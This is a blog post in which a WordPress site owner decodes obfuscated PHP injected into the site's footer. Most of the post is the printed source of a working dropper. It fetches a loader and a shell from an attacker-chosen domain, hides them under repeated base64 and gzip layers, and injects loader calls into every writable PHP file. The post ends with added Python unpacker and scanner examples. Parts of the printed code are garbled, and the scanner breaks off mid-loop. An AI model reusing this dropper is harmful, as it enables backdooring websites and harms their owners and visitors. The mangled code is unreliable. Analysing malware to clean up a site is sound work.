Dealing with code injection.

Okay, so twice in as many weeks I’ve hit the front page of taktak.co.uk and found that the footer has been missing and my Last.fm plugin isn’t displaying items. After a bit of poking, I stumbled across some obfuscated code tagged on to the footer after the HTML end tag.
Annoying, right? I noticed it, I beefed up security massively, locked down some sloppy open doors in WordPress and thought that was it. Indeed, until a week later it seemed that it was, but then my footer didn’t render again. Sure enough, there is some injected code at the end of the footer, guess I didn’t fix the problem after all… It was at this point that I had some time on my hands and decided that I should probably figure out exactly what the code was doing rather than blindly deleting it. In fact, I should probably reverse engineer the code to make it fix everything that it has possibly touched…

Warning, this is very code heavy and not the usual post for the site, you’ve been warned! I’ve also noticed that my code tags don’t wrap properly, guess I need to fix my CSS!

Without further ado, the following is the raw code which I pulled from the footer, all 17,000+ characters of it…:

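');
// Dropper tail: pick the last writable leaf directory under wp-content
// and write the decoded payload ($str) there as class-image.php.
$dir = ABSPATH . 'wp-content';
$wdir = end(get_leaf_dirs($dir));
$f = fopen($wdir . "/class-image.php", "w+");
fwrite($f, $str);
fclose($f);
echo "";
// Recursively collect writable directories that have no writable subdirectories.
function get_leaf_dirs($dir) {
    $array = array();
    $d = dir($dir);
    while (false !== ($entry = $d->read())) {
        if ($entry != '.' && $entry != '..') {
            $entry = $dir . '/' . $entry;
            if (is_dir($entry) && is_writable($entry)) {
                $subdirs = get_leaf_dirs($entry);
                if ($subdirs)
                    $array = array_merge($array, $subdirs);
                else
                    $array[] = $entry;
            }
        }
    }
    $d->close();
    return $array;
}
?>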

So being a software engineer, the first thing that jumps out is that array? What is ‘a’ holding? First thoughts are base64 encoding and gzinflate due to the lettering that it contains. It was at this point that I started working it all out on the back of an envelope:

[Image: Obfuscated code]

I abandoned it halfway through and took to Excel (Yes really..) purely so that I could tab through all of the array accesses rather than possibly make a mistake on my envelope.

[Image: ObfuscatedCodeExcel]

Once Excel had given me my answers I backfilled the envelope for completeness… The output confirmed my previous best guess so I set about decoding the bulk of the code with the help of browser-based decoders (Okay, I’m too lazy to install PHP and echo the output, so sue me!)
I plumbed the function in as it would be now that we know the ordering:

eval(gzinflate(base64_decode($v)))

With $v being the passed in parameter of the encoded data from above.
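The same decode can be done statically, treating the PHP purely as text and never evaluating it. The following is an added example, not code from the original post: it resolves the character-lookup array to confirm the decoder chain and then peels any number of eval(gzinflate(base64_decode(...))) layers, which goes beyond the layers seen in this post. The stub layout and the names $a7 and $b12 are assumptions modelled on the hide_eval function in the decoded output further down, and the sample input is constructed and harmless.

```python
"""Static unpacker: nothing is evaluated, the PHP is handled purely as text."""
import base64
import re
import zlib

MAX_INFLATED = 8 * 1024 * 1024  # per-layer output cap (decompression-bomb guard)
DECODER = "eval(gzinflate(base64_decode($v)));"

# Assumed stub layout: $arr = array('e',"v",...); every element is one quoted char.
ARRAY_RE = re.compile(r"""\$(\w+)\s*=\s*array\s*\(\s*((?:(['"]).\3\s*,?\s*)+)\)""")
ELEM_RE = re.compile(r"""(['"])(.)\1""")
# One packing layer: eval(gzinflate(base64_decode('...')));
LAYER_RE = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['"])\s*"""
    r"""([A-Za-z0-9+/=\s]+?)\s*\1\s*\)\s*\)\s*\)\s*;?""")


def inflate_raw(blob):
    """PHP gzinflate() is raw DEFLATE, i.e. zlib with wbits=-15."""
    d = zlib.decompressobj(wbits=-15)
    out = d.decompress(blob, MAX_INFLATED)
    if d.unconsumed_tail:
        raise ValueError("inflated layer exceeds MAX_INFLATED")
    return out


def resolve_lookup(src):
    """Rebuild the string spelled as $arr[i].$arr[j]...; returns (text, func_var)."""
    m = ARRAY_RE.search(src)
    if not m:
        return None, None
    name = m.group(1)
    table = [e.group(2) for e in ELEM_RE.finditer(m.group(2))]
    idx = [int(i) for i in re.findall(r"\$%s\[(\d+)\]" % re.escape(name), src)]
    if any(i >= len(table) for i in idx):
        raise ValueError("lookup index outside the character table")
    f = re.search(r"\$(\w+)\s*=\s*create_function\s*\(", src)
    return "".join(table[i] for i in idx), (f.group(1) if f else None)


def unwrap_stub(src):
    """If the lookup spells DECODER, rewrite $func('blob') as one plain layer."""
    text, func = resolve_lookup(src)
    if text != DECODER or func is None:
        return src
    call = re.search(r"\$%s\s*\(\s*'([^']*)'\s*\)" % re.escape(func), src)
    if not call:
        return src
    return "eval(gzinflate(base64_decode('%s')));" % call.group(1)


def peel_layers(src, max_layers=100):
    """Return (plain_source, layers_removed) by decoding layers until none remain."""
    def _decode(m):
        raw = base64.b64decode(re.sub(r"\s+", "", m.group(2)))
        return inflate_raw(raw).decode("utf-8", errors="replace")

    layers = 0
    while layers < max_layers:
        new_src, n = LAYER_RE.subn(_decode, src)
        if n == 0:
            break
        src, layers = new_src, layers + 1
    return src, layers


def deobfuscate(src):
    return peel_layers(unwrap_stub(src))


def wrap_layer(php):
    """One layer around a harmless string (used only to build the sample)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = c.compress(php.encode()) + c.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(blob).decode()


def constructed_sample(layers=3):
    """Constructed, harmless input in the assumed stub layout."""
    chars = list("6n$fa(_rgt;s4e)ilbzdcov")  # shuffled character table
    php = 'echo "constructed harmless payload";'
    for _ in range(layers):
        php = wrap_layer(php)
    blob = php[len("eval(gzinflate(base64_decode('"):-len("')));")]
    table = ",".join(("'%s'" if i % 2 else '"%s"') % c for i, c in enumerate(chars))
    chain = ".".join("$a7[%d]" % chars.index(c) for c in DECODER)
    return ("$a7 = array(%s); $b12 = create_function('$'.'v', %s); $b12('%s');"
            % (table, chain, blob))


if __name__ == "__main__":
    sample = constructed_sample()
    print(resolve_lookup(sample)[0])
    print(deobfuscate(sample))
```

The layer count it reports is worth recording, since the packer in the decoded output wraps its payload a random number of times.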

The output of the decode was thus:

eval(gzinflate(base64_decode('[base64 payload omitted]')));

At first I thought the decode hadn’t worked as the starts of the strings were identical; of course, that is a rookie mistake and I should have just diff’d them anyway. Turns out that it is doubly encoded to be annoying. Running it through the decode again brings us a bit more sanity:

full path [{$_SERVER['SCRIPT_FILENAME']}]
[s1]
";
echo "{$GLOBALS['dg_iver']}

{$GLOBALS['http']}{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}

";
$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
array_pop($path);
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);
while (count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])) {
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
$GLOBALS['dgsp'] = implode("/", $path);
$GLOBALS['fpath'] = $GLOBALS['dgsp'];
echo "root dir path [{$GLOBALS['dgsp']}/]

";
$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
dg_main_exec();
}
}
if (!function_exists('all_php_inject')) {
function all_php_inject($folder, $inj = 0, $silent = true) {
$our_folder = 0;
$folder = str_replace('\', ' / ', $folder); if($folder[strlen($folder) - 1] == ' / '){ $folder = substr($folder, 0, strlen($folder) - 1); } if(!is_dir($folder)){ if(!$silent){echo"NOT FOLDER {$folder}
";} return; } if(is_link($folder)){ if(!$silent){echo"LINK {$folder}
";} return; } if(strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')){ if(!$silent){echo"CACHE {$folder}
";} return; } if($folder . "/" == $GLOBALS['dgcp'] || file_exists($folder . ' / ' . $GLOBALS['dgin'])){ if(!$silent){echo"MAIN DIR {$folder}
";} return; } if(!$silent){echo"{$folder}
";} $h = opendir($folder); if(!$h){ if(!$silent){echo"OPENDIR {$folder}
";} return; } if(check_engine_rules($folder)){ process_file_inject($GLOBALS['dg_wpi'][count($GLOBALS['dg_wpi']) - 1], 1, 0); } $dirs = array(); while(strlen($f = readdir($h))){ if($f == ' . ' || $f == ' . . '){ continue; } $pc = 0; $lp = ""; $file = $folder . ' / ' . $f; if(is_file($file)){ if(in_array($file, $GLOBALS['dg_wpi'])){ if(!$silent){echo"BUSY {$file}
";} continue; } $mfn = substr(md5($folder . ' / '), 0, 3) . ' . php'; $sfn = substr(md5($mfn), 0, 4) . ' . php'; $mkr = md5($file); if($f == $mfn){ if(!$silent){echo"OTHER MS {$file}
";} continue; } if($f == $sfn){ if(!$silent){echo"SHELL {$file}
";} continue; } if(isset($GLOBALS['dgmn']) && $f == $GLOBALS['dgmn']){ continue; } if(!in_array(strtolower(gfe($file)), array("php","phtml","php3","php4","php5"))){ continue; } if(!is_writable($file)){ if(!$silent){echo"{$file}
";} continue; } process_file_inject($file, $inj, $silent); }elseif(is_dir($file)){ $dirs[$file] = count($dirs) + 1; } } closedir($h); foreach($dirs as $key=>$val){ all_php_inject($key, $inj, $silent); } } } if(!function_exists('clear_get_post_vars')){ function clear_get_post_vars($var){ $var = rawurldecode($var); if(get_magic_quotes_gpc() || strpos($var,'\"')){ $var = stripslashes($var); } if(strpos($var, '"')){ $var = html_entity_decode($var); } return $var; } } if(!function_exists('process_file_inject')){ function process_file_inject($file, $inj, $silent){ $lc = " < b > [notpatched] < / b > "; $lp = ""; $mkr = md5($file); $fa = file($file); $oc = implode("", $fa); $nc = $oc; /*dg_clear_exploits($nc);*/ while(preg_match(" / {
$GLOBALS['dgix']
} / si", $nc, $_r)){ if(preg_match('/md5\s+\=\s+\"(\w{32})\"/si', $_r[0], $_m)){ if($_m[1] == '00000000000000000000000000000000'){ echo " < b > BOMB < / b > < fontcolor = 'blue' > {
$file
} < / font > < br / > "; }elseif($_m[1] == $mkr){ $lc = " < b > [cleared] < / b > "; }elseif($_m[1] <> $mkr){ $lc = " < b > [otherscript] < / b > "; } } $nc = trim(str_replace($_r[0], $_r[1], $nc)); } $nc = trim(preg_replace(" / \ < \ ? php\s * \ ? \ > / s", "", $nc)); if(preg_match(" / \@zend / i", $nc)){ echo " < b > ZEND < / b > < fontcolor = 'red' > {
$file
} < / font > {
$lc
} < br / > "; }elseif($inj){ $inject = prepare_pack($GLOBALS['dgij'], rand(20, 50), 0, 1); if(in_array($file, $GLOBALS['dg_wpi'])){ $tmp = preg_split('/\}\s*[
]+\s*function/siU', $nc); if(count($tmp) > 1){ $inject = hide_eval($inject, 0, $mkr); $middle = round(count($tmp) / 2); $nc = ''; $dgi = 0; foreach($tmp as $key=>$val){ $dgi++; if($dgi == count($tmp)){ $nc = $nc.$val; }else{ if($dgi == $middle){ $nc = $nc.$val."
} {
$inject
}
function "; }else{ $nc = $nc.$val."
}
function "; } } } }else{ $tmp = preg_split('/\*\/\s*[
]+\s*function/siU', $nc); if(count($tmp) > 1){ $inject = hide_eval($inject, 0, $mkr); $middle = round(count($tmp) / 2); $nc = ''; $dgi = 0; foreach($tmp as $key=>$val){ $dgi++; if($dgi == count($tmp)){ $nc = $nc.$val; }else{ if($dgi == $middle){ $nc = $nc.$val." * / {
$inject
}
function "; }else{ $nc = $nc.$val." * /function "; } } } }else{ $inject = hide_eval($inject, 1, $mkr); $nc = $inject . "" . trim($nc); } } }else{ $inject = hide_eval($inject, 1, $mkr); $nc = $inject . "" . trim($nc); } $lp = " < b > [patched] < / b > "; } if($oc <> $nc){ if(save_text_to_file($file, $nc, 1)){ echo " < fontcolor = 'green' > {
$file
} {
$lc
} {
$lp
} < / font > < br / > "; }else{ echo " < fontcolor = 'red' > {
$file
} {
$lc
} {
$lp
} < / font > < br / > "; } } } } if(!function_exists('leave_clear_php')){ function leave_clear_php(&$txt){ $txt = substr($txt, strpos($txt, '') + 2); } } if(!function_exists('check_engine_install')){ function check_engine_install(){ global $_POST; if(!isset($_POST['dgrules']) || trim($_POST['dgrules']) == ""){ return; } $_POST['dgrules'] = trim(clear_get_post_vars($_POST['dgrules'])); $GLOBALS['dgrules'] = explode(";
", $_POST['dgrules']); $tmp = explode(" / ", $GLOBALS['dgcp']); while(count($tmp) > 0){ $path = implode(" / ", $tmp); if(check_engine_rules($path)){ break; } unset($tmp[count($tmp) - 1]); } } } if(!function_exists('check_engine_rules')){ function check_engine_rules($path){ foreach($GLOBALS['dgrules'] as $key=>$val){ $val = trim($val); $search_path = explode("@ #@", $val); $all_found = 1; foreach($search_path as $key2=>$val2){ $val2 = trim($val2); if(in_array($path . $val2, $GLOBALS['dg_wpi'])){ return 0; } if(!(file_exists($path . $val2))){ $all_found = 0; break; } } if($all_found){ foreach($search_path as $key2=>$val2){ if(is_writable($path . $val2)){ $GLOBALS['dg_wpi'][] = $path . $val2; echo "engine path {$path}{$val2}
"; return 1; } } return 0; } } return 0; } } if(!function_exists('dgdownload')){ function dgdownload($url, $connect_timeout){ if(!$url){return '';} $ret = ''; $url_info = parse_url($url); if(!isset($url_info['port']) || !$url_info['port']){ $url_info['port'] = 80; } if(!isset($url_info['path']) || !$url_info['path']){ $url_info['path'] = '/'; } if(isset($url_info['query']) && $url_info['query']){ $url_info['path'] = $url_info['path'] . "?" . $url_info['query']; } $query = "GET {$url_info['path']} HTTP/1.0
"; $query .= "Host : {
$url_info['host']
}
"; $query .= "Accept : * /*
"; $query .= "Connection: close
"; $query .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
"; $query = $query . "
"; $errno = 0; $error = ""; $sock = fsockopen($url_info['host'], $url_info['port'], $errno, $error, $connect_timeout); $h = array(); $resp = array(); if($sock){ stream_set_timeout($sock, $connect_timeout); fwrite($sock, $query); $hd = false; while(!feof($sock)){ $l = fgets($sock); if(!$hd){ if(trim($l) == ''){ $hd = true; }else{ $h[] = $l; } }else{ $resp[] = $l; } } fclose($sock); } $ret = implode("", $resp); return $ret; } } if(!function_exists('save_text_to_file')){ function save_text_to_file($fn, $t, $r = 0){ if($r){ $f = fopen($fn, "w"); }else{ $f = fopen($fn, "a"); } if($f){ fwrite($f, $t); fflush($f); fclose($f); $fs = filesize($fn); if(($t <> '' && $fs) || ($t == '' && !$fs)){ return 1; }else{ $fn = str_replace("/", "\", $fn); $fs = filesize($fn); } if(($t <> '' && $fs) || ($t == '' && !$fs)){ return 1; } }else{ return 0; } } } if(!function_exists('replace_substring')){ function replace_substring(&$text, $pret, $postt, $str){ $pos = strpos($text, $pret); if(!$pos){return false;} $pre = substr($text, 0, $pos + strlen($pret)); $pos = strpos($text, $postt, $pos); if(!$pos){return false;} $post = substr($text, $pos, strlen($text)); if(strlen($pre) && strlen($post)){ $text = $pre.$str.$post; return true; } return false; } } if(!function_exists('gfe')){ function gfe($fn){ $ret = pathinfo($fn); if(isset($ret['extension'])){ return $ret['extension']; }else{ return ""; } } } if(!function_exists('prepare_pack')){ function prepare_pack($php, $cycles = 0, $split_by_functions = 0, $zip = 0){ $ret = preg_replace("/^[^\s]+[\s]/U", "", $php); $ret = preg_replace("/[\s][^\s]+\Z/", "", $ret); $ret = trim($ret); if($split_by_functions){ $tmp = preg_split('/\}\s+function/', $ret); }else{ $tmp[] = $ret; } $skip_first = false; if(count($tmp)){ if($split_by_functions && strpos($tmp[0], 'function') === 0){ $tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0])); }else{ $skip_first = true; } $ret = ''; $count = 0; $total = count($tmp); foreach($tmp as $key=>$val){ $val = 
preg_replace("/\s+/", " ", $val); $count++; $count == $total ? $add = '' : $add = '}'; if($total > 1 && !($count == 1 && $skip_first)){ $next_encoded = '/*' . generate_string(50) . '*/
' . 'function ' . trim($val) . $add; }else{ $next_encoded = trim($val).$add; } if($zip && function_exists('gzdeflate')){ $next_encoded = gzdeflate($next_encoded, 9); } $next_encoded = base64_encode($next_encoded); if($zip && function_exists('gzdeflate')){ $ret .= "eval(gzinflate(base64_decode(' {
$next_encoded
}
')));"; }else{ $ret .= "eval(base64_decode(' {
$next_encoded
}
'));"; } } for($i = 0; $i < $cycles; $i++){ if($zip && function_exists('gzdeflate')){ $ret = gzdeflate($ret, 9); } $ret = base64_encode($ret); if($zip && function_exists('gzdeflate')){ $ret = "eval(gzinflate(base64_decode(' { $ret } ')));"; }else{ $ret = "eval(base64_decode(' { $ret } '));"; } } } return $ret; } } if(!function_exists('hide_eval')){ function hide_eval($encoded_gzipped_code, $add_php_sign = 0, $marker = ""){ $ret = ""; $replacement = "eval(gzinflate(base64_decode('"; $pos = strpos($encoded_gzipped_code, $replacement); if(!($pos === false)){ $encoded_gzipped_code = substr($encoded_gzipped_code, $pos + strlen($replacement), strlen($encoded_gzipped_code)); } $replacement = "')));"; $pos = strpos($encoded_gzipped_code, $replacement); if(!($pos === false)){ $encoded_gzipped_code = substr($encoded_gzipped_code, 0, $pos); } $l = array("e","v","a","l","g","z","i","n","f","t","b","s","6","4","_","d","c","r","o","(",")",";","$"); shuffle($l); $l = array_flip($l); $a = "("; foreach($l as $k=>$val){ rand(0, 100) < 50 ? $sep = "'" : $sep = '"'; $a .= "{$sep}{$k}{$sep},"; } $a = substr($a, 0, strlen($a) - 1) . 
");"; if($marker){ $ret .= "\$"."md5 = \"{$marker}\"; "; } $ret .= "\${$GLOBALS['dgeha']} = array{$a} "; $ret .= "\${$GLOBALS['dgehf']} = create_function('\$'.'v',\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['g']}].\${$GLOBALS['dgeha']}[{$l['z']}].\${$GLOBALS['dgeha']}[{$l['i']}].\${$GLOBALS['dgeha']}[{$l['n']}].\${$GLOBALS['dgeha']}[{$l['f']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['t']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['b']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['s']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['6']}].\${$GLOBALS['dgeha']}[{$l['4']}].\${$GLOBALS['dgeha']}[{$l['_']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['c']}].\${$GLOBALS['dgeha']}[{$l['o']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['$']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l[') ']}].\${$GLOBALS['dgeha']}[{$l[') ']}].\${$GLOBALS['dgeha']}[{$l[') ']}].\${$GLOBALS['dgeha']}[{$l['; ']}]); "; $ret .= "\${$GLOBALS['dgehf']}(' { $encoded_gzipped_code } '); "; $ret = trim($ret); if($add_php_sign){ $ret = "<"."?php " . $ret . 
" ?".">"; } return $ret; } } if(!function_exists('generate_string')){ function generate_string($len = 4){ $ret = ''; $arr = array('q','w','e','r','t','y','u','i','o','p','a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m'); for($i = 0; $i < $len; $i++){ $ret .= $arr[rand(0, count($arr) - 1)]; } return $ret; } } if(!function_exists('search_writable_dirs')){ function search_writable_dirs($folder, &$madrs, &$flag){ if($flag){ return; } $folder = str_replace('\', ' / ', $folder); if(count($madrs) > 300){ return; } if(isset($GLOBALS['dgbc'][$folder . "
"])){ echo"CHECKED {$folder}
"; return; } if(!file_exists($folder)){ echo"NOT EXISTS {$folder}
"; return; } if(strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')){ echo"CACHE {$folder}
"; return; } $h = opendir($folder); if(!$h){ return; } if(is_writable($folder)){ $fn = substr(md5($folder . ' / '), 0, 3) . ' . php'; if(file_exists($folder . ' / ' . $fn) || file_exists($folder . ' / cnf')){ echo"OLD SCRIPT {$folder}/{$fn}
[m1]
"; $madrs = array(); $madrs[$folder] = count($madrs) + 1; $flag = 1; return; } $madrs[$folder] = count($madrs) + 1; } while(($f = readdir($h)) !== FALSE){ if($f == ' . ' || $f == ' . . ' || $f == ' / ' || $f == '\'){ continue; } if($folder == ' / '){ $folder = ''; } if(is_dir($folder . ' / ' . $f)){ if(is_link($folder . ' / ' . $f)){ continue; } if(strpos($folder . ' / ' . $f . ' / ', $GLOBALS['dgsp']) === false){ echo"SKIP: {$folder}/{$f}
"; continue; } search_writable_dirs($folder . ' / ' . $f, $madrs, $flag); } } closedir($h); flush(); } } if(!function_exists('dg_main_exec')){ function dg_main_exec(){ global $_SERVER; echo"



"; flush(); $ddrs = array(); $a = false; $GLOBALS['dgcp'] = ''; echo"

LOOKING FOR THE LONGEST PATH AT {$GLOBALS['dgsp']}

"; search_writable_dirs($GLOBALS['dgsp'], $ddrs, $a); echo"";flush(); $max = 0; foreach($ddrs as $key=>$val){ $fldr = explode(' / ', $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode(' / ', $fldr); } } if(!$GLOBALS['dgcp']){ echo"nowhere to write anything
[e4]"; die; } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ echo"can'twritetothedocumentroot < / b > < br / > [e5]"; die; } $GLOBALS['dgcp'] = str_replace('\', '/', $GLOBALS['dgcp']); $GLOBALS['dgcp'] .= '/'; $GLOBALS['dgsp'] .= '/'; echo"thelongestavailablepath: < b > {
$GLOBALS['dgcp']
} < / b > < br / > "; $GLOBALS['dgin'] = substr(md5($GLOBALS['dgcp']), 0, 3) . '.php'; $GLOBALS['dgeha'] = "a" . substr(md5($GLOBALS['dgin']), 0, 1); $GLOBALS['dgehf'] = "b" . substr(md5($GLOBALS['dgin']), 0, 2); $GLOBALS['dgij'] = "if (function_exists('ob_start') && !isset(\$GLOBALS['mfsn'])) {\$GLOBALS['mfsn'] = '{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';
if (file_exists(\$GLOBALS['mfsn'])) {include_once (\$GLOBALS['mfsn']);
if (function_exists('gml') && function_exists('dgobh')) {ob_start('dgobh');
}}}"; flush(); $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo" < bcolor = 'green' > [size:
" . strlen($pms) . "] < / b > < br / > [s2] < br / > "; leave_clear_php($pms); }else{ die(" < bcolor = 'red' > downloadfailed < / b > < br / > [e2] < br / > "); } if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die(" < bcolor = 'red' > failedtosetpath < / b > < br / > [e6]"); } echo" < bcolor = 'green' > path[{$GLOBALS['dgcp']}] < / b > < br / > "; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die(" < bcolor = 'red' > failedtosetname < / b > < br / > [e7]"); } if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die(" < bcolor = 'red' > failedtosetrelativerootdir < / b > < br / > [e8]"); } echo" < bcolor = 'green' > relativerootdir[{$GLOBALS['dgsp']}] < / b > < br / > "; $packed_js = prepare_pack($pms, rand(5, 10), 1, 1); $packed_js = hide_eval($packed_js, 1); if(save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgin'], $packed_js, 1)){ echo" < bcolor = 'green' > [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}] < / b > < br / > [s4] < br / > "; }else{ echo" < bcolor = 'red' > [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}] < / b > < br / > [e9] < br / > "; die; } $GLOBALS['dgsf'] = substr(md5($GLOBALS['dgin']), 0, 4) . '.php'; flush(); $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo" < bcolor = 'green' > ss[size:
" . strlen($shl) . "] < / b > < br / > [s3] < br / > "; leave_clear_php($shl); }else{ echo" < bcolor = 'red' > downloadfailed < / b > < br / > [e3] < br / > "; } $shl = preg_replace(" / ^[^\s] + [\s] / U", "", $shl); $shl = preg_replace(" / [\s][^\s] + \Z / ", "", $shl); $shl = '/*' . generate_string(200) . '*/ ' . $shl . ' /*' . generate_string(200) . '*/ '; $packed_js = prepare_pack($shl, rand(50, 100), 0, 1); $packed_js = hide_eval($packed_js, 1); if(save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgsf'], $packed_js, 1)){ echo" < bstyle: = 'color:green' > [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}] < / b > < br / > [s5] < br / > "; }else{ echo" < bcolor = 'red' > [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}] < / b > < br / > "; } echo" < small > "; echo" < h3 > INJECTINGPHPFILES < / h3 > "; check_engine_install(); if(count($GLOBALS['dg_wpi']) > 0){ process_file_inject($GLOBALS['dg_wpi'][0], 1, 0); all_php_inject($GLOBALS['dgsp'], 0, 0); }else{ all_php_inject($GLOBALS['dgsp'], 1, 0); } if($_SERVER['SCRIPT_FILENAME'] <> $GLOBALS['dgcp'] . $GLOBALS['dgmn']){ if(copy($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgcp'] . $GLOBALS['dgmn'])){ echo"File{$_SERVER['SCRIPT_FILENAME']}copied"; }else{ echo"Failedtocopyfile{$_SERVER['SCRIPT_FILENAME']}"; } unlink($_SERVER['SCRIPT_FILENAME']); }else{ echo"Noneedtocopyfile{$_SERVER['SCRIPT_FILENAME']}"; } echo" < / small > < hr / > < b > dgok < / b > < / div > "; } } if(!isset($GLOBALS['dgbaw'])){ $GLOBALS['dgbaw'] = 1; if(isset($_GET['dgphpinfo'])){phpinfo();die;} set_time_limit(1800); ignore_user_abort(true); $GLOBALS['dg_wpi'] = array(); $GLOBALS['dgrules'] = array(); $GLOBALS['dg_iver'] = "4.0"; $GLOBALS['http'] = 'http:/'.'/'; $GLOBALS['dgmn'] = "class -image . 
php"; $GLOBALS['dgfn'] = ""; $GLOBALS['dg_id'] = ""; $GLOBALS['dgix'] = '\$'.'md5\s\=\s\"\w{32}\"\;\s*\$[^\s]+\s\=\s[^\s]+\;\s*\$[^\s]+\s\=\screate\_function[^\s]+\;\s*\$[^\s]+\s*(\S)'; if(isset($_GET['dgd']) || isset($_POST['dgd'])){ error_reporting(E_ALL); }else{ error_reporting(0); } if($GLOBALS['dgmn'] && (!strpos($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgmn'])) || !file_exists($_SERVER['SCRIPT_FILENAME'])){ if(file_exists($_SERVER['PATH_TRANSLATED'])){ $_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED']; }else{ echo" < bcolor = 'red' > can't detect full path [{$_SERVER['SCRIPT_FILENAME']}]

[e1]"; die; } } if(!$GLOBALS['dg_id'] && isset($_GET['dgdomain']) && $_GET['dgdomain']){ $GLOBALS['dg_id'] = $_GET['dgdomain']; } if(!$GLOBALS['dg_id'] && isset($_POST['dgdomain']) && $_POST['dgdomain']){ $GLOBALS['dg_id'] = $_POST['dgdomain']; } if((isset($_GET['dginit']) || isset($_POST['dginit']))){ if(!$GLOBALS['dg_id']){ die("[e13]"); } $GLOBALS['dg_pu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=js&host={$_SERVER['HTTP_HOST']}"; $GLOBALS['dg_eu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=shl&host={$_SERVER['HTTP_HOST']}"; $_SERVER['SCRIPT_FILENAME'] = str_replace('\', ' / ', $_SERVER['SCRIPT_FILENAME']); $_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']); die(dg_main_init()); }else{ die(""); } }

Cool, so we’re getting somewhere. I’ll expand this post when I’ve had chance to look at it some more!
Incidentally, it’s when I got to this point that I started to think people may be right and that I might be a geek…
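The decoded code above names its dropped files after MD5 prefixes of the install path (`dgin`, `dgsf`), keeps a copy of itself as `class-image.php`, and recognises its own injections with the `dgix` pattern. As an added example (not part of the original post or of the malware), the Python below turns those traits into a scanner for a site copy or backup; the function names, the `server_root` parameter and the reason labels are assumptions made for this example.

```python
import hashlib
import os
import re

# Prefix of the dropper's own self-detection regex ($GLOBALS['dgix']):
# $md5 = "<32 chars>"; $x = <array>; $y = create_function...
MARKER = re.compile(rb'\$md5\s=\s"\w{32}";\s*\$\S+\s=\s\S+;\s*\$\S+\s=\screate_function')

def md5_prefix(text, n):
    return hashlib.md5(text.encode()).hexdigest()[:n]

def expected_names(server_dir):
    """File names the dropper derives for a directory (path as PHP saw it, no trailing slash)."""
    loader = md5_prefix(server_dir + "/", 3) + ".php"   # $GLOBALS['dgin']
    shell = md5_prefix(loader, 4) + ".php"              # $GLOBALS['dgsf']
    return {loader: "loader", shell: "shell",
            "class-image.php": "installer", "cnf": "cnf"}

def scan(local_root, server_root=None):
    """Return sorted (relative_path, reason) findings under local_root."""
    server_root = (server_root or os.path.abspath(local_root)).replace("\\", "/").rstrip("/")
    findings = []
    for cur, _dirs, files in os.walk(local_root):
        rel_dir = os.path.relpath(cur, local_root).replace(os.sep, "/")
        server_dir = server_root if rel_dir == "." else f"{server_root}/{rel_dir}"
        names = expected_names(server_dir)
        for name in files:
            rel = name if rel_dir == "." else f"{rel_dir}/{name}"
            if name in names:
                findings.append((rel, names[name]))
            if name.endswith(".php"):
                with open(os.path.join(cur, name), "rb") as fh:
                    if MARKER.search(fh.read()):
                        findings.append((rel, "injected-marker"))
    return sorted(findings)

if __name__ == "__main__":
    import sys
    # usage: scan.py <local copy of site> [absolute path of the site on the server]
    root = sys.argv[1]
    server = sys.argv[2] if len(sys.argv) > 2 else None
    for path, reason in scan(root, server):
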